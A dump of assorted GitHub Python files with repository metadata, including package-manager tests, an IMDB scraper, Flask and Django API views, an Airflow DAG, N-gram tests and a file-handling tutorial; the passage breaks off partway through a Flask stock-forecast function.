os.remove(os.path.expanduser('~/.cache/hkg/hkghello.hkg'))\n os.rmdir(os.path.expanduser('~/.cache/hkg'))\n os.remove(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/hkghello.sh'))\n os.remove(os.path.expanduser('~/.local/share/hkg/hkghello/metadata'))\n os.remove(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/etc/settings.conf'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/etc'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello/lib'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello/hkghello'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg/hkghello'))\n os.remove(os.path.expanduser('~/.local/share/hkg/packages.hdb'))\n os.rmdir(os.path.expanduser('~/.local/share/hkg'))\n os.remove(os.path.expanduser('~/bin/hkghello'))\n\n # Could add this functionality so user doesn't have to manually edit .bashrc\n def test_configure_user_home_bin_dir_in_user_path(self):\n \n pass\n\n # Could test if the new executable that was installed has execute bit set properly for user\n def test_can_properly_run_newly_installed_executable_in_shell(self):\n \n pass\n\n\nclass TestRemovePackage(unittest.TestCase):\n\n def test_delete_package(self):\n\n # Setup\n self.assertTrue(hkg.install_package('hkghello', ''))\n\n # Test and Cleanup\n self.assertTrue(hkg.remove_package('hkghello'))\n\n\nclass TestUpdatePackage(unittest.TestCase):\n\n def test_update_package(self):\n\n self.assertTrue(hkg.update_package('all', False))\n pass\n\n def test_can_download_repo_package_databases(self):\n \n pass\n\n def test_can_compare_local_and_remote_package_databases(self):\n \n pass\n\n def test_can_pass_list_of_packages_needing_update_to_install_function(self):\n \n pass\n\n\nclass TestPackageInformation(unittest.TestCase):\n\n def test_list_packages(self):\n\n self.assertTrue(hkg.list_packages('http://sffennel.desktop.amazon.com/files/packages/hkg'))\n self.assertTrue(hkg.list_packages('all'))\n # Odd testing situation here\n # HKG works fine if the local package database is empty\n # However, this test errors out (not just fails, but errors out the interpreter) if there are no installed pkgs\n hkg.install_package('hkghello', '')\n self.assertTrue(hkg.list_packages('local'))\n hkg.remove_package('hkghello')\n self.assertFalse(hkg.list_packages('http://127.0.0.1/no/eggs/for/you'))\n\n def test_show_package_information(self):\n\n # Test against package in cache\n hkg.install_package('hkghello', '')\n self.assertTrue(hkg.package_info('hkghello'))\n hkg.remove_package('hkghello')\n\n # Test against package not in cache\n self.assertTrue(hkg.package_info('hkghello'))\n os.remove(os.path.expanduser('~/.cache/hkg/hkghello.hkg'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Eadrom/python-hkg","sub_path":"hkg_development/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":16480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30721477152","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 27 11:07:03 2016\n\n@author: sonia\n\"\"\"\n\nfrom lxml import html\nimport requests\nimport pandas as pd\nimport time \nimport sys\n\nyears_list = pd.read_csv('Data/imdb_years.csv')\n\n## Extract list for each year and write to a csv file\nfor yr in range(2004, 2015):\n link_to_year_list = years_list.loc[years_list['year'] == yr].link\n #link_to_list_2015 = years_list.loc[years_list['year'] == 2015].link\n page = requests.get(link_to_year_list.values[0]) \n tree = html.fromstring(page.content)\n\n name = tree.xpath('//h3[@class=\"lister-item-header\"]//a//text()') # parse movie name\n movie_link = tree.xpath('//h3[@class=\"lister-item-header\"]//a/@href') # parse the link to movie page\n release_year = tree.xpath('//h3//span[@class=\"lister-item-year text-muted unbold\"]//text()') # parse the year of release\n\n\n\n nextpage_path = tree.xpath('//a[@class=\"lister-page-next next-page\"]/@href')[0] # parse the link to got to the next page\n nextpage = 'http://www.imdb.com/search/title' + nextpage_path\n print('page', 1, 'extracted')\n\n df = pd.DataFrame({'name': name, 'release_year': release_year, 'movie_page_link': movie_link})\n\n start = time.time()\n # repeat the above process for all pages, and extend the lists\n for i in range(48):\n page = requests.get(nextpage)\n tree = html.fromstring(page.content)\n \n next_name = tree.xpath('//h3[@class=\"lister-item-header\"]//a//text()')\n next_movie_link = tree.xpath('//h3[@class=\"lister-item-header\"]//a/@href')\n next_release_year = tree.xpath('//h3//span[@class=\"lister-item-year text-muted unbold\"]//text()')\n next_array = [next_name, next_movie_link, next_release_year]\n \n if (len(next_name)== len(next_release_year)) & (len(next_release_year)==len(next_movie_link)):\n next_df = pd.DataFrame({'name': next_name, 'release_year': next_release_year, 'movie_page_link': next_movie_link})\n df = pd.concat([df, next_df])\n print(i+2, 'data frames merged')\n \n if i < 197:\n nextpage_path = tree.xpath('//a[@class=\"lister-page-next next-page\"]/@href')[0]\n nextpage = 'http://www.imdb.com/search/title' + nextpage_path\n else:\n break\n print('page', i+2, 'extracted')\n print(\"total time taken this loop: \", time.time() - start) \n\n\n # write to a file\n file_name = 'imdb_list_' + str(yr) + '.csv'\n df.to_csv(file_name)\n print(yr, 'done!')\n","repo_name":"soniasharma/MovieRevenuePrediction","sub_path":"IMDB_movies_list.py","file_name":"IMDB_movies_list.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32807706690","text":"import DatabaseConnection\r\nimport locale\r\n\r\n\r\n# We create bank account by adding new records into the Customers table\r\n\r\ntrigger = DatabaseConnection.sql.connect(host=DatabaseConnection.host, user=DatabaseConnection.user,\r\n password=DatabaseConnection.password, database=\"Customers\")\r\ntrigger_handle = trigger.cursor()\r\n\r\nlocale.setlocale(locale.LC_MONETARY, 'en_NG')\r\n\r\ndef account_bal_retrieval():\r\n cus_input = input(\"Enter account Number: \\n\")\r\n # we select account balance from the user input\r\n try:\r\n acc_balance = \"SELECT Balance FROM Customers WHERE Account_Number = %s\"\r\n bal_value = (str(cus_input),) # convert the input to string\r\n trigger_handle.execute(acc_balance, bal_value)\r\n acc_bal_tpl = trigger_handle.fetchone()\r\n acc_bal = acc_bal_tpl[0]\r\n acc_bal_currency = locale.currency(acc_bal, grouping=True)\r\n except Exception as ex:\r\n print(\"Failed to carry out operation\")\r\n print(ex)\r\n\r\n # we select account name from the user input\r\n acc_name = \"SELECT Name FROM Customers WHERE Account_Number = %s\"\r\n name_value = (str(cus_input),)\r\n trigger_handle.execute(acc_name, name_value)\r\n name_display_tpl = trigger_handle.fetchone()\r\n name_display = name_display_tpl[0]\r\n\r\n print(f\"Dear {name_display},\\n\"\r\n f\"your account balance is:\\n\"\r\n f\" {acc_bal_currency}\")\r\n print(\"===============================================\\n\")\r\n print(\"What would you like to do next? \\n\")\r\n","repo_name":"al-fatih87/bank-simulator","sub_path":"AccountBalance.py","file_name":"AccountBalance.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36725605609","text":"from .utils import return_jsonp, auth_jsonp, auth_logger\nfrom jsmodule import set_context as set_js_context\nfrom urllib.parse import urljoin\n\ndef set_context(request):\n return set_js_context({\n 'json_view_prefix': urljoin(request.path, '$')[:-1]\n })\n\ndef get_log_view(logger):\n @return_jsonp\n @auth_jsonp\n def get_logs(request):\n max_count = 1000\n GET = request.GET\n logs = logger.get_records(GET.get('from'), GET.get('to'), max_count + 1)\n if len(logs) > max_count:\n return {\n 'logs': logs[:max_count],\n 'is_all': False\n }\n return {\n 'logs': logs,\n 'is_all': True\n }\n return get_logs\n\nget_logs = get_log_view(auth_logger)\n","repo_name":"bec5-group/bec5-web","sub_path":"json_view/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7611262238","text":"import unittest\n\nfrom NGram.InterpolatedSmoothing import InterpolatedSmoothing\nfrom test.SimpleSmoothingTest import SimpleSmoothingTest\n\n\nclass InterpolatedSmoothingTest(SimpleSmoothingTest, unittest.TestCase):\n\n def setUp(self) -> None:\n super().setUp()\n interpolatedSmoothing = InterpolatedSmoothing()\n self.complexBiGram.calculateNGramProbabilitiesTrained(self.validationCorpus, interpolatedSmoothing)\n self.complexTriGram.calculateNGramProbabilitiesTrained(self.validationCorpus, interpolatedSmoothing)\n\n def test_PerplexityComplex(self):\n self.assertAlmostEqual(917.214864, self.complexBiGram.getPerplexity(self.testCorpus), 4)\n self.assertAlmostEqual(3000.451177, self.complexTriGram.getPerplexity(self.testCorpus), 4)\n\n def test_CalculateNGramProbabilitiesComplex(self):\n self.assertAlmostEqual(0.000418, self.complexBiGram.getProbability(\"\", \"mustafa\"), 4)\n self.assertAlmostEqual(0.005555, self.complexBiGram.getProbability(\"mustafa\", \"kemal\"), 4)\n self.assertAlmostEqual(0.014406, self.complexTriGram.getProbability(\"\", \"mustafa\", \"kemal\"), 4)\n self.assertAlmostEqual(0.058765, self.complexTriGram.getProbability(\"mustafa\", \"kemal\", \"atatürk\"), 4)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"StarlangSoftware/NGram-Py","sub_path":"test/InterpolatedSmoothingTest.py","file_name":"InterpolatedSmoothingTest.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"36457818864","text":"#to open a file placed in same location as that of python file\r\nf = open(\"datafile.txt\", \"r\")\r\nprint(f.read())\r\nf.close()\r\n#to open a file placed in different directory\r\n'''f = open(\"D:\\\\demofile.txt\", \"r\")\r\nprint(f.read())\r\nf.close()'''\r\n#to read only specific part from the text file\r\nf = open(\"datafile.txt\", \"r\")\r\nprint(f.read(5))\r\n#you can return one line by using the readline() method:\r\nprint(f.readline())\r\n#By looping through the lines of the file, you can read the whole file, line by line:\r\nf = open(\"datafile.txt\", \"r\")\r\nfor x in f:\r\n print(x)\r\n\r\n#To write to an existing file\r\nf = open(\"datafile.txt\", \"a\")\r\nf.write(\"Now the file has more content!\")\r\nf.close()\r\n\r\n#open and read the file after the appending:\r\nf = open(\"datafile.txt\", \"r\")\r\nprint(f.read())\r\n#to overite the content we must open file in w mode\r\nf = open(\"demofile3.txt\", \"w\")\r\nf.write(\"Woops! I have deleted the content!\")\r\nf.close()\r\n\r\n#open and read the file after the appending:\r\nf = open(\"demofile3.txt\", \"r\")\r\nprint(f.read())\r\n#\r\nf = open(\"myfile.txt\", \"x\")\r\n#to delete a file\r\nimport os\r\nif os.path.exists(\"demofile.txt\"):\r\n os.remove(\"demofile.txt\")\r\nelse:\r\n print(\"The file does not exist\")\r\n ","repo_name":"vaibhavkamble460/21-DAYS-PROGRAMMING-CHALLENGE","sub_path":"filehandling.py","file_name":"filehandling.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14240624669","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of LDTObserverTools.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Created on 17-Oct-2022\n#\n# @author: tbowers\n\n\"\"\"FITS File Utility Module\n\nLDTObserverTools contains python ports of various LDT Observer Tools\n\nLowell Discovery Telescope (Lowell Observatory: Flagstaff, AZ)\nhttps://lowell.edu\n\nThis file contains FITS Header utility routines.\n\"\"\"\n\n# Built-In Libraries\nimport pathlib\n\n# 3rd-Party Libraries\nimport ccdproc\n\n# Local Libraries\nfrom obstools import utils\n\n# CONSTANTS\n\n\ndef fix_ldt_header(files: str | pathlib.Path | list, keyword: str, new_value):\n \"\"\"Change FITS header keywords\n\n Sometimes at the telescope, incorrect or incomplete information is placed\n into the FITS header. This routine is a simple wraper around CCDPROC\n functions for easily making changes to these keywords.\n\n Parameters\n ----------\n files : :obj:`str` or :obj:`~pathlib.Path` or :obj:`list`\n The file(s) for which to update FITS keywords\n keyword : :obj:`str`\n FITS keyword to update\n new_value : :obj:`~typing.Any`\n New value for the FITS keyword\n \"\"\"\n if isinstance(files, list):\n files = [pathlib.Path(f).resolve() for f in files]\n else:\n files = [pathlib.Path(files).resolve()]\n\n # Build the IFC\n icl = ccdproc.ImageFileCollection(filenames=files)\n\n for hdr in icl.headers(overwrite=True):\n # Attempt to get numerical values as numbers, not strings\n try:\n hdr[keyword] = float(new_value)\n except ValueError:\n hdr[keyword] = new_value\n\n\n# Command Line Script Infrastructure (borrowed from PypeIt) ==================#\nclass FixLdtHeader(utils.ScriptBase):\n \"\"\"Script class for ``fix_ldt_header`` tool\n\n Script structure borrowed from :class:`pypeit.scripts.scriptbase.ScriptBase`.\n \"\"\"\n\n @classmethod\n def get_parser(cls, width=None):\n \"\"\"Construct the command-line argument parser.\n\n Parameters\n ----------\n description : :obj:`str`, optional\n A short description of the purpose of the script.\n width : :obj:`int`, optional\n Restrict the width of the formatted help output to be no longer\n than this number of characters, if possible given the help\n formatter. If None, the width is the same as the terminal\n width.\n formatter : :obj:`~argparse.HelpFormatter`\n Class used to format the help output.\n\n Returns\n -------\n :obj:`~argparse.ArgumentParser`\n Command-line interpreter.\n \"\"\"\n\n parser = super().get_parser(\n description=\"Fix a keyword in LDT FITS headers\", width=width\n )\n parser.add_argument(\n \"file\",\n action=\"store\",\n type=str,\n nargs=\"+\",\n help=\"File(s) on which to operate\",\n )\n parser.add_argument(\n \"keyword\", action=\"store\", type=str, help=\"FITS keyword to change\"\n )\n parser.add_argument(\n \"new_value\",\n action=\"store\",\n type=str,\n help=\"New header keyword value to insert\",\n )\n return parser\n\n @staticmethod\n def main(args):\n \"\"\"Main Driver\n\n Simple function that calls the fixer.\n \"\"\"\n # Giddy up!\n fix_ldt_header(files=args.file, keyword=args.keyword, new_value=args.new_value)\n","repo_name":"LowellObservatory/LDTObserverTools","sub_path":"obstools/fix_ldt_header.py","file_name":"fix_ldt_header.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72608023848","text":"from airflow.models import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom includes.main import get_api_data_into_db, write_aggregated_data, join_csv_data_and_latest\nfrom includes.db_manager import setup_db\n\nargs = {\n \"owner\": \"Eduardo Ferrer\",\n 'start_date': days_ago(0)\n}\n\ndag = DAG(\n dag_id='challenge_dag',\n default_args=args,\n schedule_interval='@hourly'\n)\n\nwith dag:\n setup_postgres_db_task = PythonOperator(\n task_id='setup_postgres_db',\n python_callable=setup_db\n )\n\n retrieve_api_data_task = PythonOperator(\n task_id='retrieve_api_data',\n python_callable=get_api_data_into_db\n )\n\n aggregate_data_task = PythonOperator(\n task_id='aggregate_data',\n python_callable=write_aggregated_data\n )\n\n aggregate_customer_data_task = PythonOperator(\n task_id='aggregate_customer_data',\n python_callable=join_csv_data_and_latest\n )\n\n\n\n setup_postgres_db_task.set_downstream(retrieve_api_data_task)\n retrieve_api_data_task.set_downstream(aggregate_data_task)\n retrieve_api_data_task.set_downstream(aggregate_customer_data_task)","repo_name":"eferrer686/interview-challenge","sub_path":"dags/challenge-dag.py","file_name":"challenge-dag.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73950788329","text":"from app import app\nfrom flask import json, jsonify, request, abort\nfrom mysql import DataBase\n\n@app.route('/api/admin/test', methods = ['POST'])\ndef add_test():\n json_data = request.json\n if request.method == 'POST':\n DataBase.add_test(json_data['text'], json_data['uid'], json_data['name'])\n return jsonify([{\"result\": True}])\n\n else:\n return abort(404)\n\n@app.route('/api/admin/stat', methods = ['GET'])\ndef get_all_stats():\n if request.method == 'GET':\n data = DataBase.admin_user_results()\n\n result = jsonify(data)\n result.status_code = 200\n return result\n else:\n return abort(404)\n\n\n@app.route('/api/admin/test/', methods = ['DELETE', 'GET'])\ndef remove_test(id):\n if request.method == 'DELETE':\n DataBase.remove_test(id)\n return jsonify([{\"result\": True}])\n\n elif request.method == 'GET':\n data = DataBase.get_one_test(id)\n result = jsonify(data)\n result.status_code = 200\n\n return result\n else:\n return abort(404)\n\n\n\n@app.route('/api/admin', methods = ['POST'])\ndef login_as_admin():\n return 'login'\n\n@app.route('/api/login', methods = ['POST'])\ndef login_as_user():\n json_data = request.json\n if request.method == 'POST':\n get_id = DataBase.add_user(json_data['first_name'], json_data['last_name'])\n return jsonify(get_id)\n else:\n return abort(404)\n\n@app.route('/api/test', methods = ['GET'])\ndef show_all_tests():\n data = DataBase.all_tests()\n\n result = jsonify(data)\n result.status_code = 200\n return result\n\n@app.route('/api/test/', methods = ['GET'])\ndef show_test(id):\n data = DataBase.get_test(id)\n result = jsonify(data)\n result.status_code = 200\n\n return result\n\n@app.route('/api/stat/', methods = ['POST', 'GET'])\ndef user_stats(id):\n if request.method == \"POST\":\n json_data = request.json\n DataBase.add_stat(id,\n json_data['test_id'],\n json_data['test_time'],\n json_data['err_count'],\n json_data['pos'])\n return jsonify([{\"result\" : True}])\n\n elif request.method == \"GET\":\n data = DataBase.get_result(id)\n\n result = jsonify(data)\n return result\n\n else:\n return abort(404)\n\n@app.route('/api/last/', methods = ['GET'])\ndef user_last_stat(id):\n data = DataBase.get_last_result(id)\n\n result = jsonify(data)\n return result\n","repo_name":"arshevchenko/psyho-test","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30645783348","text":"import pytest\n\nfrom logging import CRITICAL, NOTSET\nfrom unittest.mock import MagicMock, call, patch\n\nfrom utils.close_player import close_player, _ClosePlayerThread\n\n\nclass AsyncMock(MagicMock):\n async def __call__(self, *args, **kwargs):\n return super(AsyncMock, self).__call__(*args, **kwargs)\n\n\ndef test_close_player_function():\n with patch(\"utils.close_player._ClosePlayerThread\") as mock_thread:\n mock_player = MagicMock()\n mock_thread_instance = MagicMock()\n mock_thread.return_value = mock_thread_instance\n\n close_player(mock_player)\n\n mock_thread.assert_called_once_with(mock_player)\n mock_thread_instance.start.assert_called_once()\n mock_thread_instance.join.assert_called_once_with()\n mock_player.stop_listening.assert_not_called()\n\n\ndef test_close_player_thread_init():\n p = MagicMock()\n t = _ClosePlayerThread(p)\n assert t.player is p\n\n\n@pytest.mark.asyncio\nasync def test_close_player_thread_test_stop_player():\n with patch(\"utils.close_player.disable\") as mock_disable:\n p = MagicMock()\n p.stop_listening = AsyncMock()\n t = _ClosePlayerThread(p)\n\n await t.stop_player()\n\n mock_disable.assert_has_calls([call(CRITICAL), call(NOTSET)])\n p.stop_listening.assert_called_once()\n\n\ndef test_close_player_thread_run():\n with patch(\"asyncio.new_event_loop\") as mock_new_loop:\n mock_loop = MagicMock()\n mock_new_loop.return_value = mock_loop\n\n p = MagicMock()\n t = _ClosePlayerThread(p)\n t.stop_player = MagicMock()\n mock_coro = MagicMock()\n t.stop_player.return_value = mock_coro\n\n t.run()\n\n mock_new_loop.assert_called_once()\n mock_loop.run_until_complete.assert_called_once_with(mock_coro)\n","repo_name":"MatteoH2O1999/alphaPoke","sub_path":"tests/unit_tests/utils/test_close_player.py","file_name":"test_close_player.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22546666682","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\n File name: vip.py\r\n Function Des: ...\r\n ~~~~~~~~~~\r\n \r\n author: Jerry \r\n \r\n\"\"\"\r\nfrom flask.ext.restful import Resource, request, marshal_with\r\n\r\nfrom RESTfulApi.handler.vip import get_all_vips, create_vip, get_vips, rm_vip\r\n\r\nfrom RESTfulApi.utils.parsers import token_parser\r\nfrom RESTfulApi.utils.parsers.vip import vip_post_parser\r\nfrom RESTfulApi.utils.fields import deleted_fields, pt_fields\r\nfrom RESTfulApi.utils.fields.vip import vips_fields\r\n\r\n\r\nclass Vips(Resource):\r\n @marshal_with(vips_fields)\r\n def get(self):\r\n token = token_parser.parse_args().token\r\n args = request.args\r\n if args:\r\n vips = get_vips(args, token=token)\r\n else:\r\n vips = get_all_vips(token=token)\r\n return {'vips': vips}\r\n\r\n @marshal_with(pt_fields)\r\n def post(self):\r\n token = token_parser.parse_args().token\r\n vip_args = vip_post_parser.parse_args()\r\n result = create_vip(vip_args.username, vip_args.nickname, vip_args.phone, token=token)\r\n return result\r\n\r\n\r\nclass Vip(Resource):\r\n @marshal_with(deleted_fields)\r\n def delete(self, vip_id):\r\n token = token_parser.parse_args().token\r\n result = rm_vip(vip_id, token=token)\r\n return result\r\n","repo_name":"skyduy/RESTfulAPI","sub_path":"RESTfulApi/resources/vip.py","file_name":"vip.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"53"} +{"seq_id":"13053134923","text":"import math\nimport random\nimport pygame as pg\n\n# -------------------- Параметры работы программы --------------------\n\nH, W = 800, 1200\nWINDOW_TITLE = 'Reflection'\nFPS = 60\nSPARKLE_COUNT = 50\nBACKGROUND_COLOR = (50, 50, 50)\nSPARKLE_COLOR = (200, 200, 200)\nBOX_BORDER_COLOR = (220, 220, 220)\nBOX_BACKGROUND_COLOR = (120, 120, 120)\nTEXT_COLOR = (20, 20, 20)\n\n# Коэффициент для перевода градусов в радианы\nK_RADIAN = math.pi / 180\n\n# Словарь для хранения всех отрезков\nALL_SEGMENTS = {}\n\n# Словарь для хренения всех фигур\nALL_BOXES = []\n\n# Список для хранения всех светлячков\nALL_SPARKLE_ITERATORS = []\n\n\n# -------------------- Функции отрисовки --------------------\n\n\ndef draw_background(sc):\n sc.fill(BACKGROUND_COLOR)\n\n\ndef draw_sparkle(sc, sparkle_iterators):\n for sparkle_iterator in sparkle_iterators:\n x, y = next(sparkle_iterator)\n pg.draw.rect(sc, SPARKLE_COLOR, (int(x - 1), int(y - 1), 3, 3))\n\n\ndef draw_boxes(sc, boxes, font):\n for box in boxes:\n x = min(box.dots, key=lambda val: val[0])[0]\n y = min(box.dots, key=lambda val: val[1])[1]\n center_x, center_y = x + box.width // 2, y + box.height // 2\n pg.draw.rect(sc, BOX_BACKGROUND_COLOR, (x, y, box.width, box.height))\n pg.draw.rect(sc, BOX_BORDER_COLOR, (x, y, box.width, box.height), 1)\n\n text = font.render(str(box.collision_count), 0, TEXT_COLOR)\n sc.blit(text, (center_x - text.get_rect().width // 2, center_y - text.get_rect().height // 2))\n\n\n# -------------------- Вспомогательные функции --------------------\n\ndef create_borders_segment():\n \"\"\"Функция создает отрезки - границы окна\"\"\"\n segments_data = [\n ((0, 0), (0, H)),\n ((0, H), (W, H)),\n ((W, H), (W, 0)),\n ((W, 0), (0, 0))\n ]\n for dot1, dot2 in segments_data:\n ALL_SEGMENTS[Segment(dot1, dot2)] = None\n\n\ndef create_sparkle_iterators():\n \"\"\"Функция создает итераторы всех светлячков\"\"\"\n for _ in range(SPARKLE_COUNT):\n sparkle = Sparkle((W // 2, H // 2))\n ALL_SPARKLE_ITERATORS.append(iter(sparkle))\n\n\ndef create_boxes():\n \"\"\"Функция создает фигуры\"\"\"\n preset = [(100, 100), (300, 100), (300, 300), (100, 300)]\n for y0 in range(0, H, 400):\n for x0 in range(0, W, 400):\n dots = [(x0 + dx, y0 + dy) for dx, dy in preset]\n figure = Box(dots)\n ALL_BOXES.append(figure)\n for segment in figure.segments:\n ALL_SEGMENTS[segment] = figure\n\n\ndef get_distance(dot1, dot2):\n \"\"\"Функция возвращает расстояние между двумя точками\"\"\"\n x1, y1 = dot1\n x2, y2 = dot2\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n\ndef get_intersection(segment1, segment2):\n \"\"\"Функция возвращает точку пересечения двух отрезков или None, если отрезки не пересекаются\"\"\"\n a1, b1, c1 = segment1.a, segment1.b, segment1.c\n a2, b2, c2 = segment2.a, segment2.b, segment2.c\n if (a1 * b2) == (a2 * b1):\n return None\n x = - (c1 * b2 - c2 * b1) / (a1 * b2 - a2 * b1)\n y = - (a1 * c2 - a2 * c1) / (a1 * b2 - a2 * b1)\n distance1 = get_distance((x, y), segment1.center)\n distance2 = get_distance((x, y), segment2.center)\n if (distance1 > (segment1.length / 2)) or (distance2 > (segment2.length / 2)):\n return None\n return x, y\n\n\ndef get_scalar_mul(vector1, vector2):\n \"\"\"Функция возвращает скалярное произведение векторов\"\"\"\n return vector1[0] * vector2[0] + vector1[1] * vector2[1]\n\n\ndef get_vector_sum(vector1, vector2):\n \"\"\"Функция возвращает сумму двух векторов\"\"\"\n return vector1[0] + vector2[0], vector1[1] + vector2[1]\n\n\ndef get_vector_value_mul(vector, value):\n \"\"\"Функция возвращает произведение вектора на число\"\"\"\n return vector[0] * value, vector[1] * value\n\n\ndef get_reflect_vector(vector, segment):\n \"\"\"Функция возвращает отраженный вектор\"\"\"\n normal = segment.a, segment.b\n result = get_vector_sum(\n vector,\n get_vector_value_mul(normal, -2 * get_scalar_mul(vector, normal) / get_scalar_mul(normal, normal))\n )\n return result\n\n\n# -------------------- Основные классы --------------------\n\n\nclass Sparkle:\n STEP = 5\n\n def __init__(self, dot):\n self.dot = dot\n angle = K_RADIAN * random.randint(0, 359)\n self.vector = self.STEP * math.cos(angle), self.STEP * math.sin(angle)\n self.last_reflect_segment = None\n\n def __iter__(self):\n while True:\n yield self.dot\n next_dot = self.dot[0] + self.vector[0], self.dot[1] + self.vector[1]\n\n segments = []\n step_segment = Segment(self.dot, next_dot)\n for segment in ALL_SEGMENTS.keys():\n if segment is self.last_reflect_segment:\n continue\n intersection_dot = get_intersection(segment, step_segment)\n if intersection_dot:\n segments.append((intersection_dot, segment))\n\n if segments:\n self.dot, self.last_reflect_segment = min(\n segments,\n key=lambda val: get_distance(self.dot, val[0])\n )\n self.vector = get_reflect_vector(self.vector, self.last_reflect_segment)\n box = ALL_SEGMENTS[self.last_reflect_segment]\n if box:\n box.collision_count += 1\n else:\n self.dot = next_dot\n\n\nclass Segment:\n\n def __init__(self, dot1, dot2):\n self.dot1, self.dot2 = dot1, dot2\n x1, y1 = dot1\n x2, y2 = dot2\n self.center = (x1 + x2) / 2, (y1 + y2) / 2\n self.a, self.b, self.c = y2 - y1, x1 - x2, y1 * (x2 - x1) - x1 * (y2 - y1)\n self.length = get_distance(dot1, dot2)\n\n\nclass Box:\n\n def __init__(self, dots):\n self.dots = dots\n self.segments = []\n prev_dot = None\n for dot in dots + [dots[0]]:\n if prev_dot:\n self.segments.append(Segment(prev_dot, dot))\n prev_dot = dot\n self.width = max(dots, key=lambda val: val[0])[0] - min(dots, key=lambda val: val[0])[0]\n self.height = max(dots, key=lambda val: val[1])[1] - min(dots, key=lambda val: val[1])[1]\n self.collision_count = 0\n\n\ndef main():\n pg.init()\n sc = pg.display.set_mode((W, H))\n pg.display.set_caption(WINDOW_TITLE)\n clock = pg.time.Clock()\n font = pg.font.SysFont('Arial', 50)\n\n create_borders_segment()\n create_sparkle_iterators()\n create_boxes()\n\n while True:\n events = pg.event.get()\n for event in events:\n if event.type == pg.QUIT:\n pg.quit()\n exit()\n\n draw_background(sc)\n draw_sparkle(sc, ALL_SPARKLE_ITERATORS)\n draw_boxes(sc, ALL_BOXES, font)\n pg.display.update()\n\n clock.tick(FPS)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SergeyLebidko/Reflection","sub_path":"start.pyw","file_name":"start.pyw","file_ext":"pyw","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39220257766","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport datetime\r\nfrom io import BytesIO\r\nimport base64\r\nfrom flask import render_template, request, make_response\r\nimport yfinance as yf\r\nfrom src import app\r\nfrom src.utilities import MasterProphet\r\nfrom src.utilities import Dataset\r\n\r\n@app.after_request\r\ndef add_header(response):\r\n response.headers[\"X-UA-Compatible\"] = \"IE=Edge,chrome=1\"\r\n response.headers[\"Cache-Control\"] = \"public, max-age=0\"\r\n return response\r\n\r\n@app.route(\"/\")\r\n@app.route(\"/home\")\r\ndef home():\r\n \"\"\" Renders the home page \"\"\"\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/predict\", methods=[\"POST\", \"GET\"])\r\ndef predict():\r\n ticker = request.form[\"ticker\"]\r\n master_prophet = MasterProphet(ticker)\r\n\r\n forecast = master_prophet.forecast()\r\n\r\n # Fetch historical data using yfinance\r\n historical_data = yf.download(ticker, start='2010-01-01', end=pd.Timestamp.now().strftime('%Y-%m-%d'))\r\n\r\n actual_forecast = round(forecast.yhat[0], 2)\r\n lower_bound = round(forecast.yhat_lower[0], 2)\r\n upper_bound = round(forecast.yhat_upper[0], 2)\r\n bound = round(((upper_bound - actual_forecast) + (actual_forecast - lower_bound) / 2), 2)\r\n\r\n summary = master_prophet.info[\"summary\"]\r\n country = master_prophet.info[\"country\"]\r\n sector = master_prophet.info[\"sector\"]\r\n website = master_prophet.info[\"website\"]\r\n min_date = master_prophet.info[\"min_date\"]\r\n max_date = master_prophet.info[\"max_date\"]\r\n\r\n forecast_date = master_prophet.forecast_date.date()\r\n\r\n # Plotting the forecast using fbprophet's plot function\r\n fig, ax = plt.subplots(figsize=(12, 8))\r\n master_prophet.model.plot(forecast, ax=ax)\r\n ax.set_title(\"Forecast for Stock Price\")\r\n ax.set_xlabel(\"Date\")\r\n ax.set_ylabel(\"Stock Price\")\r\n ax.grid(True)\r\n\r\n # Add markers for actual and forecasted 